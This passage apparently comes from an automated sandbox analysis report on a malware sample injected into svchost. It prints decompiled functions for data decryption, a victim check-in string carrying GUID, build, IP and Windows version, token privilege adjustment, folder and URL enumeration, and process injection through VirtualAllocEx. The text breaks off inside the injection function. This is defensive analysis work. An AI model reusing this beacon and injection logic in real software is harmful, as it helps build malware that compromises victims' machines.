                                                                                                                                        • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 10004335
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                          • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                          • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                                                                                        • String ID: *.*$\*.*
                                                                                                                                        • API String ID: 3040542784-1692270452
                                                                                                                                        • Opcode ID: 95df30f0a96735e48b4b14098533dc866f4e50dbac32fbb44b4015c2d9744c9c
                                                                                                                                        • Instruction ID: 8c46a5e388c265dbd94ec75caa8cec349609daf9b32e0d2eeafafdca37b19f99
                                                                                                                                        • Opcode Fuzzy Hash: 95df30f0a96735e48b4b14098533dc866f4e50dbac32fbb44b4015c2d9744c9c
                                                                                                                                        • Instruction Fuzzy Hash: 1D411CB550010ABAFF11DF60CC42BED7AA5EF143C0F128191FA18A5069DF31AAA0AB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 7.75%

                                                                                                                                        Function 02442F20, Relevance: 12.1, APIs: 8, Instructions: 92encryptionUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                        			E02442F20(BYTE* _a4, int _a8, intOrPtr _a12, intOrPtr _a16) {
				int _v8;
				long* _v12;
				long* _v16;
				int _v20;
				intOrPtr _v24;
				int _t32;
				intOrPtr _t33;
				long* _t35;

				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_t32 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
				if(_t32 != 0) {
					__imp__CryptCreateHash(_v12, 0x8004, 0, 0,  &_v8); // executed
					if(_t32 != 0) {
						_t33 = _a16;
						__imp__CryptHashData(_v8, _a12, _t33, 0);
						if(_t33 != 0) {
							_v24 = 0x280011;
							_t35 = _v12;
							__imp__CryptDeriveKey(_t35, 0x6801, _v8, _v24,  &_v16); // executed
							if(_t35 != 0) {
								if(CryptDecrypt(_v16, 0, 1, 0, _a4,  &_a8) != 0) {
									_v20 = _a8;
								}
							}
						}
					}
				}
				if(_v8 != 0) {
					__imp__CryptDestroyHash(_v8);
					_v8 = 0;
				}
				if(_v16 != 0) {
					CryptDestroyKey(_v16);
					_v16 = 0;
				}
				if(_v12 != 0) {
					CryptReleaseContext(_v12, 0);
					_v12 = 0;
				}
				return _v20;
			}











                                                                                                                                        0x02442f26
                                                                                                                                        0x02442f2d
                                                                                                                                        0x02442f34
                                                                                                                                        0x02442f3b
                                                                                                                                        0x02442f51
                                                                                                                                        0x02442f59
                                                                                                                                        0x02442f76
                                                                                                                                        0x02442f7e
                                                                                                                                        0x02442f86
                                                                                                                                        0x02442f92
                                                                                                                                        0x02442f9a
                                                                                                                                        0x02442fa0
                                                                                                                                        0x02442fb8
                                                                                                                                        0x02442fbc
                                                                                                                                        0x02442fc4
                                                                                                                                        0x02442fe4
                                                                                                                                        0x02442fed
                                                                                                                                        0x02442fed
                                                                                                                                        0x02442fe4
                                                                                                                                        0x02442fc4
                                                                                                                                        0x02442f9a
                                                                                                                                        0x02442f7e
                                                                                                                                        0x02442ff4
                                                                                                                                        0x02442ffa
                                                                                                                                        0x02443000
                                                                                                                                        0x02443000
                                                                                                                                        0x0244300b
                                                                                                                                        0x02443011
                                                                                                                                        0x02443017
                                                                                                                                        0x02443017
                                                                                                                                        0x02443022
                                                                                                                                        0x0244302a
                                                                                                                                        0x02443030
                                                                                                                                        0x02443030
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,02441FCD), ref: 02442F51
                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 02442F76
                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 02442FFA
                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 02443011
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0244302A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$ContextDestroyHash$AcquireCreateRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1222261195-0
                                                                                                                                        • Opcode ID: db66ee63ab3aeb611899154533d24326c1862f496751f286e24bab2a13267cb8
                                                                                                                                        • Instruction ID: 53fba3a0b7f050e2a1daa7b30d651da60f1c9acb35ec654c8e9acd625fdae07b
                                                                                                                                        • Opcode Fuzzy Hash: db66ee63ab3aeb611899154533d24326c1862f496751f286e24bab2a13267cb8
                                                                                                                                        • Instruction Fuzzy Hash: 02313E75E40208FBEB24CF90D848FAF77B8BB04704F10854AFA02A7284DBB5AA54DF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 02441580, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 136UNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                        			E02441580(void* __ecx, signed int __edx, void* _a4, intOrPtr _a8, DWORD* _a12) {
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				char _v56;
				char _v312;
				char _v1336;
				signed int _t34;
				signed int _t38;
				signed int _t40;
				intOrPtr _t42;
				void* _t44;
				signed int _t45;
				intOrPtr _t50;
				char* _t51;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				void* _t61;
				signed int _t65;
				char* _t76;
				char* _t80;
				signed int _t82;
				signed int _t83;
				signed int _t88;
				char* _t92;
				signed int _t96;
				void* _t97;
				void* _t99;
				void* _t100;

				_t83 = __edx;
				_t34 =  *0x2447418; // 0xd1fddc2
				_t101 = _t34 |  *0x244741c;
				if((_t34 |  *0x244741c) == 0) {
					_t65 = E02441770(_t101); // executed
					 *0x2447418 = _t65;
					 *0x244741c = _t83;
				}
				if( *0x2447420 == 0) {
					 *0x2447420 = GetVersion();
				}
				E02443360( &_v312); // executed
				E02441ED0( &_v56); // executed
				_t99 = _t97 + 8;
				_t38 =  *0x2447420; // 0x42ee000a
				_v12 = _t38 & 0xff;
				_t40 =  *0x2447420; // 0x42ee000a
				_v24 = (_t40 & 0xffff) >> 0x00000008 & 0xff;
				_v20 = 0;
				_t42 = E02443690(); // executed
				_v20 = _t42;
				if(_v20 != 1) {
					_push(_v24);
					_t44 = E02441F70( &_v312);
					_t88 =  *0x244741c; // 0x4f492964
					_t45 =  *0x2447418; // 0xd1fddc2
					wsprintfA( &_v1336, "GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)", _t45, _t88, _t44,  &_v312,  &_v56, _v12);
					_t100 = _t99 + 0x24;
				} else {
					_push(_v24);
					_t61 = E02441F70(_v12); // executed
					_t82 =  *0x244741c; // 0x4f492964
					_t96 =  *0x2447418; // 0xd1fddc2
					wsprintfA( &_v1336, "GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)", _t96, _t82, _t61,  &_v312,  &_v56, _v12);
					_t100 = _t99 + 0x24;
				}
				if( *0x2447414 == 0) {
					_t57 = E02441390(0x400);
					_t100 = _t100 + 4;
					 *0x2447414 = _t57;
					_t80 =  *0x2447414; // 0x283cb28
					 *_t80 = 0;
				}
				_v16 = 1;
				while(_v16 == 1) {
					_t76 =  *0x2447414; // 0x283cb28
					if( *_t76 == 0) {
						_t55 =  *0x2447414; // 0x283cb28
						_t56 = E02441FE0(_t76, _t55);
						_t100 = _t100 + 4;
						_v16 = _t56;
					}
					_v8 = 0;
					_t92 =  *0x2447414; // 0x283cb28
					_t50 = E02442250(_t92,  &_v1336, _a4, _a8, _a12); // executed
					_t100 = _t100 + 0x14;
					_v8 = _t50;
					if(_v8 == 1) {
						_t54 = E024414E0( &_v1336, _a4);
						_t100 = _t100 + 4;
						_v8 = _t54;
					}
					if(_v8 != 1) {
						_t51 =  *0x2447414; // 0x283cb28
						 *_t51 = 0;
						continue;
					} else {
						return 1;
					}
				}
				__eflags = 0;
				return 0;
			}



































                                                                                                                                        0x02441580
                                                                                                                                        0x02441589
                                                                                                                                        0x0244158e
                                                                                                                                        0x02441594
                                                                                                                                        0x02441596
                                                                                                                                        0x0244159b
                                                                                                                                        0x024415a0
                                                                                                                                        0x024415a0
                                                                                                                                        0x024415ad
                                                                                                                                        0x024415b5
                                                                                                                                        0x024415b5
                                                                                                                                        0x024415c1
                                                                                                                                        0x024415cd
                                                                                                                                        0x024415d2
                                                                                                                                        0x024415d5
                                                                                                                                        0x024415eb
                                                                                                                                        0x024415ee
                                                                                                                                        0x02441607
                                                                                                                                        0x0244160a
                                                                                                                                        0x02441611
                                                                                                                                        0x02441616
                                                                                                                                        0x0244161d
                                                                                                                                        0x02441660
                                                                                                                                        0x02441670
                                                                                                                                        0x02441676
                                                                                                                                        0x0244167d
                                                                                                                                        0x0244168f
                                                                                                                                        0x02441695
                                                                                                                                        0x0244161f
                                                                                                                                        0x02441622
                                                                                                                                        0x02441632
                                                                                                                                        0x02441638
                                                                                                                                        0x0244163f
                                                                                                                                        0x02441652
                                                                                                                                        0x02441658
                                                                                                                                        0x02441658
                                                                                                                                        0x0244169f
                                                                                                                                        0x024416a6
                                                                                                                                        0x024416ab
                                                                                                                                        0x024416ae
                                                                                                                                        0x024416bb
                                                                                                                                        0x024416c1
                                                                                                                                        0x024416c1
                                                                                                                                        0x024416c5
                                                                                                                                        0x024416cc
                                                                                                                                        0x024416de
                                                                                                                                        0x024416ea
                                                                                                                                        0x024416ec
                                                                                                                                        0x024416f2
                                                                                                                                        0x024416f7
                                                                                                                                        0x024416fa
                                                                                                                                        0x024416fa
                                                                                                                                        0x024416fd
                                                                                                                                        0x02441717
                                                                                                                                        0x0244171e
                                                                                                                                        0x02441723
                                                                                                                                        0x02441726
                                                                                                                                        0x0244172d
                                                                                                                                        0x02441733
                                                                                                                                        0x02441738
                                                                                                                                        0x0244173b
                                                                                                                                        0x0244173b
                                                                                                                                        0x02441742
                                                                                                                                        0x02441753
                                                                                                                                        0x02441758
                                                                                                                                        0x00000000
                                                                                                                                        0x02441744
                                                                                                                                        0x00000000
                                                                                                                                        0x02441744
                                                                                                                                        0x02441742
                                                                                                                                        0x02441761
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32 ref: 024415AF
                                                                                                                                        • wsprintfA.USER32 ref: 02441652
                                                                                                                                          • Part of subcall function 02441770: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,0244159B,00004000), ref: 024417B5
                                                                                                                                          • Part of subcall function 02441770: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02441828
                                                                                                                                          • Part of subcall function 02441770: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0244185E
                                                                                                                                        • wsprintfA.USER32 ref: 0244168F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$AdaptersAddressesDirectoryInformationVersionVolumeWindows
                                                                                                                                        • String ID: GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)$GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)$d)IO
                                                                                                                                        • API String ID: 2510645398-2750374242
                                                                                                                                        • Opcode ID: 649a2147f3860a00c4273458a4d92f3438e57c238e8b3e22fd592a13ea3dc256
                                                                                                                                        • Instruction ID: c0190bf76768e4f6dff054f76ae3e4336d41ce78f807509ce367fe8dee6a24c4
                                                                                                                                        • Opcode Fuzzy Hash: 649a2147f3860a00c4273458a4d92f3438e57c238e8b3e22fd592a13ea3dc256
                                                                                                                                        • Instruction Fuzzy Hash: BD51B7B9D001149FE718EF94ED44BBABBF9EB44341F10897AE10D97240DB34A695CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 10004DF4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10004DF4(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char** _v336;
				char* _t31;
				void* _t40;

				_v332 = 0;
				_t31 = _a8;
				if(_t31 == 0 ||  *_t31 == 0) {
					L12:
					return E10001871(_v332);
				} else {
					E10004D93(_a4, E10001DB1(_a8, _a12)); // executed
					E10001871(_t33);
					_v332 = E10001DB1(_a8, "\*.*");
					E1000189F( &_v324, 0x13e);
					_t40 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t40;
					if(_t40 + 1 == 0) {
						goto L12;
					} else {
						goto L4;
					}
					do {
						L4:
						if((_v324.dwFileAttributes & 0x00000010) != 0) {
							if(lstrcmpiA(0x1000f8fd,  &( &_v324->cFileName)) != 0) {
								if(lstrcmpiA(0x1000f8ff,  &( &_v324->cFileName)) != 0) {
									_v336 =  &( &_v324->cFileName);
									E10004D93(_a4, E10001E05(E10001E05(E10001DB1(_a8, "\\"), _v336), _a12));
									E10001871(_t53);
								}
							}
						}
					} while (FindNextFileA(_v328,  &_v324) != 0);
					FindClose(_v328);
					goto L12;
				}
			}









                                                                                                                                        0x10004dfd
                                                                                                                                        0x10004e0a
                                                                                                                                        0x10004e0c
                                                                                                                                        0x10004f1c
                                                                                                                                        0x10004f28
                                                                                                                                        0x10004e18
                                                                                                                                        0x10004e28
                                                                                                                                        0x10004e2d
                                                                                                                                        0x10004e3f
                                                                                                                                        0x10004e51
                                                                                                                                        0x10004e63
                                                                                                                                        0x10004e68
                                                                                                                                        0x10004e6f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10004e75
                                                                                                                                        0x10004e75
                                                                                                                                        0x10004e81
                                                                                                                                        0x10004e99
                                                                                                                                        0x10004eb3
                                                                                                                                        0x10004ec0
                                                                                                                                        0x10004eed
                                                                                                                                        0x10004ef2
                                                                                                                                        0x10004ef2
                                                                                                                                        0x10004eb3
                                                                                                                                        0x10004e99
                                                                                                                                        0x10004f09
                                                                                                                                        0x10004f17
                                                                                                                                        0x00000000
                                                                                                                                        0x10004f17

                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 10004E63
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FD,?,00000000,?,00000000), ref: 10004E92
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FF,?,1000F8FD,?,00000000,?,00000000), ref: 10004EAC
                                                                                                                                        • FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 10004F04
                                                                                                                                        • FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 10004F17
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 3663067366-1173974218
                                                                                                                                        • Opcode ID: 6e9f3b2f661a78dfcedb154696400a72def13b63283fb19ae1fe3acc463d6ff2
                                                                                                                                        • Instruction ID: ca2568b92c372c15e6a77308df9f7a69600f7f07acdd9bda305e561ea92058fa
                                                                                                                                        • Opcode Fuzzy Hash: 6e9f3b2f661a78dfcedb154696400a72def13b63283fb19ae1fe3acc463d6ff2
                                                                                                                                        • Instruction Fuzzy Hash: 7431FEB5800259AEFF21DF60CC42BED77A9FF043C0F0581A5FA0895069EB70AE959F54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 10007FE8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75comUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                        			E10007FE8(intOrPtr _a4) {
				void* _v8;
				void* _v12;
				short _v44;
				WCHAR* _v48;
				char _v52;
				char _v56;
				short _v60;
				char* _t34;
				void* _t35;
				short* _t45;
				void* _t47;

				_t34 =  &_v8;
				_push(_t34);
				_push(0x100102e6);
				_push(5);
				_push(0);
				_push(0x100102d6); // executed
				L1000BA76(); // executed
				if(_t34 < 0) {
					L15:
					_t35 = E10007E6C(_t47, _a4, L"http://www.facebook.com/", 0); // executed
					return _t35;
				}
				_push( &_v12);
				_push(_v8);
				if( *((intOrPtr*)( *_v8 + 0x1c))() < 0 || _v12 == 0) {
					L14:
					 *((intOrPtr*)( *_v8 + 8))(_v8);
					goto L15;
				} else {
					_v48 = 0;
					_v44 = 0;
					_v52 = 0x28;
					while(1) {
						_v56 = 0;
						_push( &_v56);
						_push( &_v52);
						_push(1);
						_push(_v12);
						if( *((intOrPtr*)( *_v12 + 0xc))() != 0 || _v56 != 1) {
							break;
						}
						if(_v48 != 0) {
							_t45 = StrStrIW(_v48, 0x10010306);
							if(_t45 == 0) {
								_v60 = 0;
							} else {
								 *_t45 = 0;
								_v60 = _t45;
							}
							E10007E6C(_t47, _a4, _v48, _v60); // executed
							_push(_v48);
							L1000BA70();
							if(_v44 != 0) {
								_push(_v44);
								L1000BA70();
							}
						}
					}
					 *((intOrPtr*)( *_v12 + 8))(_v12);
					goto L14;
				}
			}














                                                                                                                                        0x10007fee
                                                                                                                                        0x10007ff1
                                                                                                                                        0x10007ff2
                                                                                                                                        0x10007ff7
                                                                                                                                        0x10007ff9
                                                                                                                                        0x10007ffb
                                                                                                                                        0x10008000
                                                                                                                                        0x10008007
                                                                                                                                        0x100080cd
                                                                                                                                        0x100080d7
                                                                                                                                        0x100080dd
                                                                                                                                        0x100080dd
                                                                                                                                        0x10008015
                                                                                                                                        0x10008016
                                                                                                                                        0x1000801e
                                                                                                                                        0x100080c2
                                                                                                                                        0x100080ca
                                                                                                                                        0x00000000
                                                                                                                                        0x1000802e
                                                                                                                                        0x1000802e
                                                                                                                                        0x10008035
                                                                                                                                        0x1000803c
                                                                                                                                        0x10008043
                                                                                                                                        0x10008043
                                                                                                                                        0x10008052
                                                                                                                                        0x10008056
                                                                                                                                        0x10008057
                                                                                                                                        0x10008059
                                                                                                                                        0x10008061
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000806d
                                                                                                                                        0x1000807c
                                                                                                                                        0x1000807e
                                                                                                                                        0x1000808a
                                                                                                                                        0x10008080
                                                                                                                                        0x10008080
                                                                                                                                        0x10008085
                                                                                                                                        0x10008085
                                                                                                                                        0x1000809a
                                                                                                                                        0x1000809f
                                                                                                                                        0x100080a2
                                                                                                                                        0x100080ab
                                                                                                                                        0x100080ad
                                                                                                                                        0x100080b0
                                                                                                                                        0x100080b0
                                                                                                                                        0x100080ab
                                                                                                                                        0x100080b5
                                                                                                                                        0x100080bf
                                                                                                                                        0x00000000
                                                                                                                                        0x100080bf

                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.OLE32(100102D6,00000000,00000005,100102E6,?), ref: 10008000
                                                                                                                                        • StrStrIW.SHLWAPI(00000000,10010306), ref: 10008077
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,10010306), ref: 100080A2
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,00000000,10010306), ref: 100080B0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeTask$CreateInstance
                                                                                                                                        • String ID: ($http://www.facebook.com/
                                                                                                                                        • API String ID: 2903366249-3677894361
                                                                                                                                        • Opcode ID: 8f3a87d63b887a218965d62a6876c54d32db941eb3b8df55ee95578add9bc555
                                                                                                                                        • Instruction ID: 2e64bef66f41ddc4b1a66eece88495d7a9d10eb9c068adbd9e87130d3328e792
                                                                                                                                        • Opcode Fuzzy Hash: 8f3a87d63b887a218965d62a6876c54d32db941eb3b8df55ee95578add9bc555
                                                                                                                                        • Instruction Fuzzy Hash: 1D31D834A00109EBEF51DF90DC49BCEBBB5FF08394F208161F5407A1A9D7759A85DB51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 02443690, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                        			E02443690() {
				_Unknown_base(*)()* _v8;
				struct _SYSTEM_INFO _v44;

				E024414A0( &_v44, 0, 0x24);
				_v8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
				if(_v8 == 0) {
					GetSystemInfo( &_v44);
				} else {
					_v8( &_v44);
				}
				if((_v44.dwOemId & 0x0000ffff) != 9) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                        0x0244369e
                                                                                                                                        0x024436bd
                                                                                                                                        0x024436c4
                                                                                                                                        0x024436d3
                                                                                                                                        0x024436c6
                                                                                                                                        0x024436ca
                                                                                                                                        0x024436ca
                                                                                                                                        0x024436e0
                                                                                                                                        0x00000000
                                                                                                                                        0x024436e2
                                                                                                                                        0x00000000
                                                                                                                                        0x024436e2

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,?,?,?,?,02441616), ref: 024436B0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 024436B7
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 024436CA
                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 024436D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                        • API String ID: 3433367815-192647395
                                                                                                                                        • Opcode ID: 93371b545174a059cdea28744164dea968e72c38e83e8c50afe26ffeb16695fc
                                                                                                                                        • Instruction ID: 24216ae7f7160d90c8cef98bea5d8f925e8ff2a82e52afe02114463377d73a51
                                                                                                                                        • Opcode Fuzzy Hash: 93371b545174a059cdea28744164dea968e72c38e83e8c50afe26ffeb16695fc
                                                                                                                                        • Instruction Fuzzy Hash: 6CF0B434D44208EBF7149FE0980ABEDBBB8AB08F11F504447E902B6240EB749694CB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 10002941, Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                        			E10002941(CHAR* _a4, intOrPtr _a8) {
				struct _LUID _v12;
				void* _v16;
				int _v20;
				void* _v24;
				void* _v28;
				struct _TOKEN_PRIVILEGES _v32;
				int _t19;
				int _t28;
				void* _t30;

				if( *0x1000f4e8 == 0 ||  *0x1000f4ec == 0 ||  *0x1000f4d4 == 0) {
					return 0;
				} else {
					_t30 = 0;
					_v16 = 0;
					_t19 = LookupPrivilegeValueA(0, _a4,  &_v12); // executed
					if(_t19 != 0) {
						if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v16) != 0) {
							_v32.PrivilegeCount = 1;
							 *_t7 = _v12.LowPart;
							_push(_v12.HighPart);
							_pop( *_t9);
							if(_a8 == 0) {
								_v20 = 0;
							} else {
								_v20 = 2;
							}
						}
						_t28 = AdjustTokenPrivileges(_v16, 0,  &_v32, 0x10, 0, 0); // executed
						if(_t28 != 0) {
							_t30 = _t30 + 1;
						}
					}
					if(_v16 != 0) {
						CloseHandle(_v16); // executed
					}
					return _t30;
				}
			}












                                                                                                                                        0x1000294f
                                                                                                                                        0x10002967
                                                                                                                                        0x1000296a
                                                                                                                                        0x1000296a
                                                                                                                                        0x1000296c
                                                                                                                                        0x1000297c
                                                                                                                                        0x10002984
                                                                                                                                        0x1000299c
                                                                                                                                        0x1000299e
                                                                                                                                        0x100029a8
                                                                                                                                        0x100029ab
                                                                                                                                        0x100029ae
                                                                                                                                        0x100029b5
                                                                                                                                        0x100029c0
                                                                                                                                        0x100029b7
                                                                                                                                        0x100029b7
                                                                                                                                        0x100029b7
                                                                                                                                        0x100029b5
                                                                                                                                        0x100029d6
                                                                                                                                        0x100029de
                                                                                                                                        0x100029e0
                                                                                                                                        0x100029e0
                                                                                                                                        0x100029de
                                                                                                                                        0x100029e5
                                                                                                                                        0x100029ea
                                                                                                                                        0x100029ea
                                                                                                                                        0x100029f3
                                                                                                                                        0x100029f3

                                                                                                                                        APIs
                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1000297C
                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 10002986
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 10002994
                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 100029D6
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 100029EA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3038321057-0
                                                                                                                                        • Opcode ID: d5d753e71fece0a3681d6b0666b468dde01dd85d6dc41ea8bff8f77c289c312e
                                                                                                                                        • Instruction ID: 58a22c2d32b5f492d318d977b920c660c9bd5fc2f262262849804c374510ad66
                                                                                                                                        • Opcode Fuzzy Hash: d5d753e71fece0a3681d6b0666b468dde01dd85d6dc41ea8bff8f77c289c312e
                                                                                                                                        • Instruction Fuzzy Hash: 20112E36900209EBFF51CF90CC8ABEEBBB9FB00385F104129E511A51D8D7B49A44DF64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.04%

                                                                                                                                        Function 024434F0, Relevance: 6.1, APIs: 4, Instructions: 116memoryinjectionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                        			E024434F0(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				SIZE_T* _v28;
				SIZE_T* _v32;
				void* _t59;
				void* _t61;
				SIZE_T* _t63;
				int _t70;
				void* _t97;
				void* _t98;

				_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
				_v16 =  *((intOrPtr*)(_v24 + 0x34));
				_v20 =  *((intOrPtr*)(_v24 + 0x50));
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				while(1) {
					_t59 = VirtualAllocEx(_a4, _v16, _v20, 0x3000, 0x40); // executed
					_v8 = _t59;
					if(_v8 == 0) {
						_v8 = VirtualAllocEx(_a4, 0, _v20, 0x3000, 0x40);
						_v16 = _v8;
					}
					if(_v8 == 0) {
						break;
					}
					_t61 = E02441390(_v20);
					_t98 = _t97 + 4;
					_v12 = _t61;
					if(_v12 != 0) {
						_v32 = 0;
